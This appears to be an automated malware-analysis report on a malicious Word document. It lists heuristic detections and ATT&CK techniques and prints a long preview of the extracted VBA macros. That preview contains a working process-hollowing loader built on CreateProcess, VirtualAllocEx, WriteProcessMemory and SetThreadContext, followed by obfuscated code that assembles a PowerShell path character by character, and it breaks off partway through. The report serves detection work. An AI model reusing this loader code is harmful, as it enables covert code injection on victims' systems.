MALICIOUS
452
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros. The macros utilize Windows API calls such as CreateProcess, VirtualAlloc, and WriteProcessMemory, indicating an attempt to execute arbitrary code. Specifically, the 'Document_Open' macro and references to PowerShell and cmd.exe suggest the script is designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Downloader.Pwshell-10001336-0' further supports this conclusion.
Heuristics 14
-
ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
-
Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORYReference to WriteProcessMemory API
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
'strSrcFile = "C:\Windows\System32\cmd.exe" strSrcFile = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
For i = 0 To 2 Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") Set colProcess = objWMIService.ExecQuery("Select * from Win32_Process WHERE Name = ""WINWORD.EXE"" AND CommandLine Like ""%win%"" ") -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
' Arguments: strFilename - Fullname of the file as a String (ex: ' 'C:\Windows\System32\cmd.exe') ' Returns: The content of the file as a Byte array -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Sub Private Sub Document_open() -
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x40 bytes
Disassembly
Attempted x86 opcode disassembly00020D3B 40 inc eax 00020D3C 40 inc eax 00020D3D 40 inc eax 00020D3E 40 inc eax 00020D3F 40 inc eax 00020D40 40 inc eax 00020D41 40 inc eax 00020D42 40 inc eax 00020D43 40 inc eax 00020D44 40 inc eax 00020D45 40 inc eax 00020D46 40 inc eax 00020D47 40 inc eax 00020D48 40 inc eax 00020D49 40 inc eax 00020D4A 40 inc eax 00020D4B 40 inc eax 00020D4C 40 inc eax 00020D4D 40 inc eax 00020D4E 40 inc eax 00020D4F 40 inc eax 00020D50 40 inc eax 00020D51 40 inc eax 00020D52 40 inc eax 00020D53 40 inc eax 00020D54 40 inc eax 00020D55 40 inc eax 00020D56 40 inc eax 00020D57 40 inc eax 00020D58 40 inc eax 00020D59 40 inc eax 00020D5A 40 inc eax 00020D5B 40 inc eax 00020D5C 40 inc eax 00020D5D 40 inc eax 00020D5E 40 inc eax 00020D5F 40 inc eax 00020D60 40 inc eax 00020D61 40 inc eax 00020D62 40 inc eax 00020D63 40 inc eax 00020D64 40 inc eax 00020D65 40 inc eax 00020D66 40 inc eax 00020D67 40 inc eax 00020D68 40 inc eax 00020D69 40 inc eax 00020D6A 40 inc eax 00020D6B 40 inc eax 00020D6C 40 inc eax 00020D6D 40 inc eax 00020D6E 40 inc eax 00020D6F 40 inc eax 00020D70 40 inc eax 00020D71 40 inc eax 00020D72 40 inc eax 00020D73 40 inc eax 00020D74 40 inc eax 00020D75 40 inc eax 00020D76 40 inc eax 00020D77 41 inc ecx 00020D78 cafdb2 retf 0xb2fd 00020D7B f8 clc 00020D7C 57 push edi 00020D7D c410 les edx, ptr [eax] 00020D7F 5b pop ebx 00020D80 ed in eax, dx 00020D81 6f outsd dx, dword ptr [esi] 00020D82 ab stosd dword ptr es:[edi], eax 00020D83 188f795bfb93 sbb byte ptr [edi - 0x6c04a487], cl 00020D89 50 push eax 00020D8A 59 pop ecx 00020D8B a020202020 mov al, byte ptr [0x20202020] 00020D90 2020 and byte ptr [eax], ah 00020D92 2020 and byte ptr [eax], ah 00020D94 2020 and byte ptr [eax], ah 00020D96 2020 and byte ptr [eax], ah 00020D98 2020 and byte ptr [eax], ah 00020D9A 20 .byte 0x20
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.html�In document text (OLE body)
- https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680305(v=vs.85).aspxIn document text (OLE body)
- https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680313(v=vs.85).aspxIn document text (OLE body)
- https://msdn.microsoft.com/en-us/library/windows/desktop/ms680339(v=vs.85).aspxIn document text (OLE body)
- https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680336(v=vs.85).aspxIn document text (OLE body)
- https://www.nirsoft.net/kernel_struct/vista/IMAGE_SECTION_HEADER.htmlIn document text (OLE body)
- https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms684873(v=vs.85).aspxIn document text (OLE body)
- https://msdn.microsoft.com/en-us/library/windows/desktop/ms686331(v=vs.85).aspxIn document text (OLE body)
- https://www.nirsoft.net/kernel_struct/vista/FLOATING_SAVE_AREA.htmlIn document text (OLE body)
- https://msdn.microsoft.com/en-us/library/windows/desktop/ms679284(v=vs.85).aspxIn document text (OLE body)
- https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.htmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 66353 bytes |
SHA-256: 7d5e7e37fd7102147f85f18dc625705dd30f915b0416e8da4f2c44cc45cf207b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
#If Win64 Then
Private Declare PtrSafe Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
Private Declare PtrSafe Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare PtrSafe Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare PtrSafe Function GetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
Private Declare PtrSafe Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long
Private Declare PtrSafe Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
Private Declare PtrSafe Function SetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
Private Declare PtrSafe Function ResumeThread Lib "KERNEL32" (ByVal hThread As LongPtr) As Long
Private Declare PtrSafe Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long
#Else
Private Declare Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long)
Private Declare Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function GetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
Private Declare Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long
Private Declare Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
Private Declare Function SetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
Private Declare Function ResumeThread Lib "KERNEL32" (ByVal hThread As Long) As Long
Private Declare Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As Long, ByVal uExitCode As Integer) As Long
#End If
Private Const IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16
Private Const IMAGE_SIZEOF_SHORT_NAME = 8
Private Const MAXIMUM_SUPPORTED_EXTENSION = 512
Private Const SIZE_OF_80387_REGISTERS = 80
#If Win64 Then
Private Type M128A
Low As LongLong
High As LongLong
End Type
#End If
Private Type IMAGE_DOS_HEADER
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(4 - 1) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(10 - 1) As Integer
e_lfanew As Long
End Type
Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long
Size As Long
End Type
Private Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
Characteristics As Integer
End Type
Private Type IMAGE_OPTIONAL_HEADER
#If Win64 Then
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUninitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
ImageBase As LongLong
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
Win32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
Subsystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As LongLong
SizeOfStackCommit As LongLong
SizeOfHeapReserve As LongLong
SizeOfHeapCommit As LongLong
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY
#Else
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUninitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
Win32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
Subsystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY
#End If
End Type
Private Type IMAGE_NT_HEADERS
Signature As Long
FileHeader As IMAGE_FILE_HEADER
OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type
Private Type IMAGE_SECTION_HEADER
SecName(IMAGE_SIZEOF_SHORT_NAME - 1) As Byte
Misc As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
Characteristics As Long
End Type
Private Type PROCESS_INFORMATION
hProcess As LongPtr
hThread As LongPtr
dwProcessId As Long
dwThreadId As Long
End Type
Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As LongPtr
hStdInput As LongPtr
hStdOutput As LongPtr
hStdError As LongPtr
End Type
Private Type FLOATING_SAVE_AREA
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(SIZE_OF_80387_REGISTERS - 1) As Byte
Spare0 As Long
End Type
Private Type CONTEXT
#If Win64 Then
P1Home As LongLong
P2Home As LongLong
P3Home As LongLong
P4Home As LongLong
P5Home As LongLong
P6Home As LongLong
ContextFlags As Long
MxCsr As Long
SegCs As Integer
SegDs As Integer
SegEs As Integer
SegFs As Integer
SegGs As Integer
SegSs As Integer
EFlags As Long
Dr0 As LongLong
Dr1 As LongLong
Dr2 As LongLong
Dr3 As LongLong
Dr6 As LongLong
Dr7 As LongLong
Rax As LongLong
Rcx As LongLong
Rdx As LongLong
Rbx As LongLong
Rsp As LongLong
Rbp As LongLong
Rsi As LongLong
Rdi As LongLong
R8 As LongLong
R9 As LongLong
R10 As LongLong
R11 As LongLong
R12 As LongLong
R13 As LongLong
R14 As LongLong
R15 As LongLong
Rip As LongLong
Header(2 - 1) As M128A
Legacy(8 - 1) As M128A
Xmm0 As M128A
Xmm1 As M128A
Xmm2 As M128A
Xmm3 As M128A
Xmm4 As M128A
Xmm5 As M128A
Xmm6 As M128A
Xmm7 As M128A
Xmm8 As M128A
Xmm9 As M128A
Xmm10 As M128A
Xmm11 As M128A
Xmm12 As M128A
Xmm13 As M128A
Xmm14 As M128A
Xmm15 As M128A
VectorRegister(26 - 1) As M128A
VectorControl As LongLong
DebugControl As LongLong
LastBranchToRip As LongLong
LastBranchFromRip As LongLong
LastExceptionToRip As LongLong
LastExceptionFromRip As LongLong
#Else
ContextFlags As Long
Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long
FloatSave As FLOATING_SAVE_AREA
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
ExtendedRegisters(MAXIMUM_SUPPORTED_EXTENSION - 1) As Byte
#End If
End Type
Private Const MEM_COMMIT = &H1000
Private Const MEM_RESERVE = &H2000
Private Const PAGE_READWRITE = &H4
Private Const PAGE_EXECUTE_READWRITE = &H40
Private Const MAX_PATH = 260
Private Const CREATE_SUSPENDED = &H4
Private Const CONTEXT_FULL = &H10007
Private Const IMAGE_DOS_SIGNATURE = &H5A4D
Private Const IMAGE_NT_SIGNATURE = &H4550
Private Const IMAGE_FILE_MACHINE_I386 = &H14C
Private Const IMAGE_FILE_MACHINE_AMD64 = &H8664
Private Const SIZEOF_IMAGE_SECTION_HEADER = 40
#If Win64 Then
Private Const SIZEOF_IMAGE_NT_HEADERS = 264
Private Const SIZEOF_ADDRESS = 8
#Else
Private Const SIZEOF_IMAGE_NT_HEADERS = 248
Private Const SIZEOF_ADDRESS = 4
#End If
Public Function ByteArrayLength(baBytes() As Byte) As Long
On Error Resume Next
ByteArrayLength = UBound(baBytes) - LBound(baBytes) + 1
End Function
Private Function ByteArrayToString(baBytes() As Byte) As String
Dim strRes As String: strRes = ""
Dim iCount As Integer
For iCount = 0 To ByteArrayLength(baBytes) - 1
If baBytes(iCount) <> 0 Then
strRes = strRes & Chr(baBytes(iCount))
Else
Exit For
End If
Next iCount
ByteArrayToString = strRes
End Function
Private Function FileToByteArray(strFilename As String) As Byte()
Dim strFileContent As String
Dim iFile As Integer: iFile = FreeFile
Open strFilename For Binary Access Read As #iFile
strFileContent = Space(FileLen(strFilename))
Get #iFile, , strFileContent
Close #iFile
Dim baFileContent() As Byte
baFileContent = StrConv(strFileContent, vbFromUnicode)
FileToByteArray = baFileContent
End Function
Private Function StringToByteArray(strContent As String) As Byte()
Dim baContent() As Byte
baContent = StrConv(strContent, vbFromUnicode)
StringToByteArray = baContent
End Function
Private Function A(strA As String, bChar As Byte) As String
A = strA & Chr(bChar)
End Function
Private Function B(strA As String, strB As String) As String
B = strA + strB
End Function
Private Function PE() As String
Dim gkjfsgksjkasoiopfajvd As String
gkjfsgksjkasoiopfajvd = ""
PE = gkjfsgksjkasoiopfajvd
End Function
Public Sub sgsdkjabjkajhabvjkhabvlkadnkjanvkjabv(ByRef baImage() As Byte, strArguments As String)
Dim structDOSHeader As IMAGE_DOS_HEADER
Dim ptrDOSHeader As LongPtr: ptrDOSHeader = VarPtr(structDOSHeader)
Call RtlMoveMemory(ptrDOSHeader, VarPtr(baImage(0)), 64)
Dim j As Integer
If structDOSHeader.e_magic = IMAGE_DOS_SIGNATURE Then
Else
Exit Sub
End If
Dim structNTHeaders As IMAGE_NT_HEADERS
Dim ptrNTHeaders As LongPtr: ptrNTHeaders = VarPtr(structNTHeaders)
Call RtlMoveMemory(ptrNTHeaders, VarPtr(baImage(structDOSHeader.e_lfanew)), SIZEOF_IMAGE_NT_HEADERS)
If structNTHeaders.Signature = IMAGE_NT_SIGNATURE Then
Else
Exit Sub
End If
#If Win64 Then
If structNTHeaders.FileHeader.Machine = IMAGE_FILE_MACHINE_I386 Then
Exit Sub
End If
#Else
If structNTHeaders.FileHeader.Machine = IMAGE_FILE_MACHINE_AMD64 Then
Exit Sub
End If
#End If
Dim strCurrentFilePath As String
strCurrentFilePath = Space(MAX_PATH)
Dim lGetModuleFileName As Long
lGetModuleFileName = GetModuleFileName(0, strCurrentFilePath, MAX_PATH)
strCurrentFilePath = Left(strCurrentFilePath, InStr(strCurrentFilePath, vbNullChar) - 1)
Dim strNull As String
Dim structProcessInformation As PROCESS_INFORMATION
Dim structStartupInfo As STARTUPINFO
Dim lCreateProcess As Long
For j = 0 To 1999
Next j
lCreateProcess = CreateProcess(strNull, strCurrentFilePath + " " + strArguments, 0&, 0&, False, CREATE_SUSPENDED, 0&, strNull, structStartupInfo, structProcessInformation)
If lCreateProcess = 0 Then
Exit Sub
Else
End If
Dim structContext As CONTEXT
structContext.ContextFlags = CONTEXT_FULL
Dim lGetThreadContext As Long
For j = 0 To 1999
Next j
lGetThreadContext = GetThreadContext(structProcessInformation.hThread, structContext)
If lGetThreadContext = 0 Then
Call TerminateProcess(structProcessInformation.hProcess, 0)
Exit Sub
Else
End If
Dim lImageBase As LongPtr
#If Win64 Then
Dim lImageBaseAddrLocation As LongPtr: lImageBaseAddrLocation = structContext.Rdx + 16
#Else
Dim lImageBaseAddrLocation As LongPtr: lImageBaseAddrLocation = structContext.Ebx + 8
#End If
Dim ptrImageBase As LongPtr: ptrImageBase = VarPtr(lImageBase)
Dim lReadProcessMemory As Long
lReadProcessMemory = ReadProcessMemory(structProcessInformation.hProcess, lImageBaseAddrLocation, ptrImageBase, SIZEOF_ADDRESS, 0)
If lReadProcessMemory = 0 Then
Call TerminateProcess(structProcessInformation.hProcess, 0)
Exit Sub
Else
End If
Dim lProcessImageBase As LongPtr
lProcessImageBase = VirtualAllocEx(structProcessInformation.hProcess, structNTHeaders.OptionalHeader.ImageBase, structNTHeaders.OptionalHeader.SizeOfImage, MEM_COMMIT + MEM_RESERVE, PAGE_EXECUTE_READWRITE)
If lProcessImageBase = 0 Then
Call TerminateProcess(structProcessInformation.hProcess, 0)
Exit Sub
Else
End If
Dim lWriteProcessMemory As Long
For j = 0 To 1999
Next j
lWriteProcessMemory = WriteProcessMemory(structProcessInformation.hProcess, lProcessImageBase, VarPtr(baImage(0)), structNTHeaders.OptionalHeader.SizeOfHeaders, 0&)
If lWriteProcessMemory = 0 Then
Call TerminateProcess(structProcessInformation.hProcess, 0)
Exit Sub
Else
End If
Dim iCount As Integer
Dim structSectionHeader As IMAGE_SECTION_HEADER
Dim ptrSectionHeader As LongPtr: ptrSectionHeader = VarPtr(structSectionHeader)
For iCount = 0 To structNTHeaders.FileHeader.NumberOfSections - 1
Call RtlMoveMemory(ptrSectionHeader, VarPtr(baImage(structDOSHeader.e_lfanew + SIZEOF_IMAGE_NT_HEADERS + (iCount * SIZEOF_IMAGE_SECTION_HEADER))), SIZEOF_IMAGE_SECTION_HEADER)
Dim strSectionName As String: strSectionName = ByteArrayToString(structSectionHeader.SecName)
Dim lNewAddress As LongPtr: lNewAddress = lProcessImageBase + structSectionHeader.VirtualAddress
Dim lSize As Long: lSize = structSectionHeader.SizeOfRawData
lWriteProcessMemory = WriteProcessMemory(structProcessInformation.hProcess, lNewAddress, VarPtr(baImage(0 + structSectionHeader.PointerToRawData)), lSize, 0&)
If lWriteProcessMemory = 0 Then
Call TerminateProcess(structProcessInformation.hProcess, 0)
Exit Sub
Else
End If
Next iCount
#If Win64 Then
Dim lAddrLocation As LongPtr: lAddrLocation = structContext.Rdx + 16
#Else
Dim lAddrLocation As LongPtr: lAddrLocation = structContext.Ebx + 8
#End If
For j = 0 To 1999
Next j
lWriteProcessMemory = WriteProcessMemory(structProcessInformation.hProcess, lAddrLocation, VarPtr(structNTHeaders.OptionalHeader.ImageBase), SIZEOF_ADDRESS, 0&)
If lWriteProcessMemory = 0 Then
Call TerminateProcess(structProcessInformation.hProcess, 0)
Exit Sub
Else
End If
Dim lEntryPoint As LongPtr: lEntryPoint = lProcessImageBase + structNTHeaders.OptionalHeader.AddressOfEntryPoint
#If Win64 Then
structContext.Rcx = lEntryPoint
#Else
structContext.Eax = lEntryPoint
#End If
Dim lSetThreadContext As Long
lSetThreadContext = SetThreadContext(structProcessInformation.hThread, structContext)
If lSetThreadContext = 0 Then
Call TerminateProcess(structProcessInformation.hProcess, 0)
Exit Sub
Else
Debug.Print ("[+] |__ Applied context to the new thread")
End If
Dim lResumeThread As Long
lResumeThread = ResumeThread(structProcessInformation.hThread)
If lResumeThread = 1 Then
Else
Call TerminateProcess(structProcessInformation.hProcess, 0)
Exit Sub
End If
End Sub
Private Sub Document_close()
Dim gkjfsgksjkasoiopfajvd As String
Dim baFileContent() As Byte
Dim A As Boolean
Dim Fkjhdksjjgjksv As String
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(67)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(58)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(92)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(87)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(105)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(110)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(100)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(111)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(119)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(115)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(92)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(83)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(121)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(115)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(116)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(101)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(109)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(51)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(50)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(92)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(87)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(105)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(110)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(100)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(111)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(119)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(115)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(80)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(111)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(119)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(101)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(114)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(83)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(104)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(101)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(108)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(108)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(92)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(118)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(49)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(46)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(48)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(92)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(112)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(111)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(119)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(101)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(114)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(115)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(104)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(101)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(108)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(108)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(46)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(101)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(120)
Fkjhdksjjgjksv = Fkjhdksjjgjksv + Chr(101)
Dim HJNLksdjbjksvajklvnhjksdnjks As String
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(45)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(119)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(105)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(110)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(100)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(32)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(48)
HJNLksdjbjksvajklvnhjksdnjks = HJNLksdjbjksvajklvnhjksdnjks + Chr(48)
